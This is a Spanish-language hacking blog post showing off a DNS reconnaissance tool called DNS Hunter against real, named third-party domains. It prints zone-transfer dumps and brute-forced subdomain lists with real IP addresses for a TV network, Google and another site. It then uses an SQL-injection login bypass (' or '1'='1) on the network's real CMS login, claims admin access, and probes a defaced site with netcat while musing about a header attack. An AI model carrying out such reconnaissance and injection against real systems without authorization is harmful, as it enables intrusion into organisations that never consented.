Testeando con DNS Hunter

Posted on 13:31 by Xianur0

Nota Previa: este texto es de la versi�n reducida del DNS Hunter (es decir no la fenix).

DNS Hunter es una tool que hice para el duelo con tiger, pero me pidieron que hiciera un manual de como testear con ella, bueno vamos a lo simple:

Solo explicare algunas partes de la tool que no se vieron en los manuales de arriba:

Buscador de DNS Rotativos:
Detecta cuando un servidor usa enmascaramiento por DNS y cuando rotan los DNS (cambia de servidor DNS cada cierto tiempo).

Visualizador de Zonas:
Esta Funci�n es muy �til para detectar un servidor DNS mal configurado ademas de detectar todos los subdominios de un dominio dado, y aunque a muchos les sorprenda muchos de los servidores mas famosos son vulnerables (incluyendo a wikipedia jejejeje).

Bueno ya explique las partes "dudosas", ahora explicare como podr�amos usar esto:

Utilizare un objetivo general que encontre en google para este ligero texto xD:

telefe.com.ar

Código:
UxMal Desktop # dns.pl telefe.com.ar
..::DNS Hunter By UxMal::..

[-]Registro SOA:
telefe.com.ar. 43200 IN SOA telefe.com.ar. webmaster.telefe.com.ar. (
2007081401 ; Serial
3600 ; Refresh
180 ; Retry
1296000 ; Expire
900 ) ; Minimum TTL


[-]Servidores DNS:
tlfdns02.telefe.com.ar
tlfdns01.telefe.com.ar


[-]Buscando DNS Rotativos...:
[-]Obteniendo Informacion Extra:
telefe.com.ar. 43199 IN SOA telefe.com.ar. webmaster.telefe.com.ar. (
2007081401 ; Serial
3600 ; Refresh
180 ; Retry
1296000 ; Expire
900 ) ; Minimum TTL


[-]Intentando Obtener Zonas....: Usando: tlfdns01.telefe.com.ar
telefe.com.ar. 43200 IN SOA telefe.com.ar. webmaster.telefe.com.ar. (
2007081401 ; Serial
3600 ; Refresh
180 ; Retry
1296000 ; Expire
900 ) ; Minimum TTL
telefe.com.ar. 43200 IN MX 5 tlfdns03.telefe.com.ar.
telefe.com.ar. 43200 IN MX 10 tlfdns01.telefe.com.ar.
telefe.com.ar. 43200 IN MX 15 tlfdns02.telefe.com.ar.
telefe.com.ar. 43200 IN NS tlfdns01.telefe.com.ar.
telefe.com.ar. 43200 IN NS tlfdns02.telefe.com.ar.
telefe.com.ar. 43200 IN TXT "v=spf1 ip4:192.168.171.146 ip4:192.168.172.153 ip4:192.168.171.1 ip4:192.168.172.1 mx -all"
telefe.com.ar. 43200 IN A 66.231.227.176
bahiablanca.telefe.com.ar. 43200 IN CNAME c9bahiablanca.dyndns.org.
c11salta.telefe.com.ar. 43200 IN CNAME c11salta.dyndns.org.
c13santafe.telefe.com.ar. 43200 IN CNAME c13santafe.dyndns.org.
c5rosario.telefe.com.ar. 43200 IN CNAME c5rosario.dyndns.org.
c7neuquen.telefe.com.ar. 43200 IN CNAME c7neuquen.dyndns.org.
c8cordoba.telefe.com.ar. 43200 IN CNAME c8cordoba.dyndns.org.
c8mardelplata.telefe.com.ar. 43200 IN CNAME c8mardelplata.dyndns.org.
c8tucuman.telefe.com.ar. 43200 IN CNAME c8tucuman.dyndns.org.
c9bahiablanca.telefe.com.ar. 43200 IN CNAME c9bahiablanca.dyndns.org.
cordoba.telefe.com.ar. 43200 IN CNAME c8cordoba.dyndns.org.
daresdar.telefe.com.ar. 43200 IN A 66.231.227.173
www.daresdar.telefe.com.ar. 43200 IN A 66.231.227.173
dns1.telefe.com.ar. 43200 IN CNAME tlfdns01.telefe.com.ar.
dns2.telefe.com.ar. 43200 IN CNAME tlfdns02.telefe.com.ar.
dns3.telefe.com.ar. 43200 IN CNAME tlfdns03.telefe.com.ar.
ftp.telefe.com.ar. 43200 IN A 200.51.91.146
gh07.telefe.com.ar. 43200 IN A 66.231.227.173
gh07famosos.telefe.com.ar. 43200 IN A 66.231.227.173
gh2007.telefe.com.ar. 43200 IN A 66.231.227.173
gh5.telefe.com.ar. 43200 IN A 66.231.227.173
www.gh5.telefe.com.ar. 43200 IN A 66.231.227.173
hq.telefe.com.ar. 43200 IN CNAME hq1.telefe.com.ar.
hq1.telefe.com.ar. 43200 IN A 200.51.44.188
hq2.telefe.com.ar. 43200 IN A 200.51.91.155
mail1.telefe.com.ar. 43200 IN CNAME tlfdns01.telefe.com.ar.
mail2.telefe.com.ar. 43200 IN CNAME tlfdns02.telefe.com.ar.
mail3.telefe.com.ar. 43200 IN CNAME tlfdns03.telefe.com.ar.
mail4.telefe.com.ar. 43200 IN CNAME tlfdns04.telefe.com.ar.
mardelplata.telefe.com.ar. 43200 IN CNAME c8mardelplata.dyndns.org.
mundoshow.telefe.com.ar. 43200 IN A 206.221.200.244
neuquen.telefe.com.ar. 43200 IN CNAME c7neuquen.dyndns.org.
noticias.telefe.com.ar. 43200 IN A 66.231.227.176
noticias_cms.telefe.com.ar. 43200 IN A 66.231.227.176
proveedores.telefe.com.ar. 43200 IN A 200.51.91.149
www.proveedores.telefe.com.ar. 43200 IN A 200.51.91.149
rosario.telefe.com.ar. 43200 IN CNAME c5rosario.dyndns.org.
salta.telefe.com.ar. 43200 IN CNAME c11salta.dyndns.org.
santafe.telefe.com.ar. 43200 IN CNAME c13santafe.dyndns.org.
telefe1.telefe.com.ar. 43200 IN A 200.51.91.152
telefe2.telefe.com.ar. 43200 IN A 200.16.211.181
telefe6.telefe.com.ar. 43200 IN A 200.51.91.153
teleinde1.telefe.com.ar. 43200 IN A 200.51.44.187
tlf-cap-01.telefe.com.ar. 43200 IN A 200.51.91.149
tlfdns01.telefe.com.ar. 43200 IN A 200.51.91.146
tlfdns02.telefe.com.ar. 43200 IN A 200.51.44.189
tlfdns03.telefe.com.ar. 43200 IN A 200.51.91.153
tlfdns04.telefe.com.ar. 43200 IN A 200.51.91.150
tucuman.telefe.com.ar. 43200 IN CNAME c8tucuman.dyndns.org.
webmail.telefe.com.ar. 43200 IN A 200.51.91.152
www.telefe.com.ar. 43200 IN A 66.231.227.176

denotamos que es vulnerable a intercambio de zonas, bueno este seria un uso simple:

http://noticias_cms.telefe.com.ar/home/index.php

como notaran es un login, si probamos SQL Inyection:
User: ' or '1'='1
Password: ' or '1'='1

Disculpe las molestias

Admin Admin

en estos momentos estamos

trabajando para Ud.


como podr�n notar entramos como admin al sistema xD.

Ahora checamos a google:

Código:
UxMal Desktop # dns.pl google.com
..::DNS Hunter By UxMal::..

[-]Registro SOA:
google.com. 86400 IN SOA ns1.google.com. dns-admin.google.com. (
2008030601 ; Serial
7200 ; Refresh
1800 ; Retry
1209600 ; Expire
300 ) ; Minimum TTL


[-]Servidores DNS:
ns2.google.com
ns3.google.com
ns4.google.com
ns1.google.com


[-]Buscando DNS Rotativos...:
IP: 64.233.187.99
Host: jc-in-f99.google.com

IP: 64.233.167.99
Host: py-in-f99.google.com

IP: 72.14.207.99
Host: eh-in-f99.google.com

[-]Obteniendo Informacion Extra:
google.com. 86399 IN SOA ns1.google.com. dns-admin.google.com. (
2008030601 ; Serial
7200 ; Refresh
1800 ; Retry
1209600 ; Expire
300 ) ; Minimum TTL


[-]Intentando Obtener Zonas....: Usando: ns1.google.com
No se Logro Obtener Zonas :(...Provando DNS Brutes Forces:
www.google.com existe!
www2.google.com existe!
www3.google.com existe!
ns1.google.com existe!
ns2.google.com existe!
ns3.google.com existe!
ns4.google.com existe!
ns.google.com existe!
mail.google.com existe!
download.google.com existe!
email.google.com existe!
group.google.com existe!
news.google.com existe!
newsfeed.google.com existe!
print.google.com existe!
proxy.google.com existe!
smtp.google.com existe!
earth.google.com existe!
toolbar.google.com existe!
desktop.google.com existe!
pack.google.com existe!
groups.google.com existe!
directory.google.com existe!
picasa.google.com existe!
book.google.com existe!
books.google.com existe!
adwords.google.com existe!
ads.google.com existe!
images.google.com existe!
checkout.google.com existe!
picasaweb.google.com existe!
scholar.google.com existe!
webaccelerator.google.com existe!
code.google.com existe!
pages.google.com existe!
base.google.com existe!
docs.google.com existe!
doc.google.com existe!
catalog.google.com existe!
catalogs.google.com existe!
labs.google.com existe!
uploads.google.com existe!
adwords.google.com existe!
answers.google.com existe!
bizsolutions.google.com existe!
maps.google.com existe!
map.google.com existe!
directory.google.com existe!
gears.google.com existe!
services.google.com existe!
video.google.com existe!
research.google.com existe!
transfer.google.com existe!
vpn.google.com existe!
web.google.com existe!

Como podran notar tiene usa un sistema de enmascaramiento por DNS, es decir el DNS rota cada cierto tiempo, eso es util cuando un deface, es decir cambia la web y nadie ve el deface, o tambien para evitar scanners, etc. Ahora que tenemos los DNS's, podriamos realizar un scanneo mas extensivo. aparte de ello, al no ser vulnerable a intercambio de zonas, corrio el DNS Brutes Forces, que como podran notar, saco informacion interesante jejeje...


Otro uso:
Código:
UxMal Desktop # dns.pl atenea-linux.com
..::DNS Hunter By UxMal::..

[-]Registro SOA:
atenea-linux.com. 3600 IN SOA ns1.awardspace.com. hostmaster.awardspace.com. (
2008030601 ; Serial
10800 ; Refresh
3600 ; Retry
1209600 ; Expire
7200 ) ; Minimum TTL


[-]Servidores DNS:
ns1.awardspace.com
ns2.awardspace.com
ns3.awardspace.com
ns4.awardspace.com


[-]Buscando DNS Rotativos...:
IP: 82.197.131.52
Host: www7.awardspace.com

IP: 82.197.131.52
Host: www7.awardspace.com

[-]Obteniendo Informacion Extra:
atenea-linux.com. 3599 IN SOA ns1.awardspace.com. hostmaster.awardspace.com. (
2008030601 ; Serial
10800 ; Refresh
3600 ; Retry
1209600 ; Expire
7200 ) ; Minimum TTL


[-]Intentando Obtener Zonas....: Usando: ns4.awardspace.com
No se Logro Obtener Zonas :(...Provando DNS Brutes Forces:
www.atenea-linux.com existe!
mail.atenea-linux.com existe!

Buscando DNS's Rotativos, denotamos que detecto awardspace como host de esa web, no se si es por el hack que le hicieron xD, o por que de por si el _ANtrAX_ lo puso ahi jejeje


IP: 82.197.131.52
Host: www7.awardspace.com

aparentemente esta en el servidor www7 de awardspace:

Código:
UxMal Desktop # nc -vvv 82.197.131.52 80
Warning: forward host lookup failed for www7.awardspace.com: Unknown host
www7.awardspace.com [82.197.131.52] 80 (http) open
GET / HTTP/1.1
Host: www.atenea-linux.com

HTTP/1.1 200 OK
Date: Fri, 07 Mar 2008 23:30:49 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

94c
<title>y0u 4r3 0wn3d m0th3r fuck3r !! xDDDDD</title&gtl..... y de mas xD...

No se ustedes, pero a mi se me ocurre realizar un ataque por headers, en fin....



Menudo manual corto, pero bueno, creo que sirve de ejemplo del uso de mi tool jeje...

lo extender� despu�s...

0 comentarios: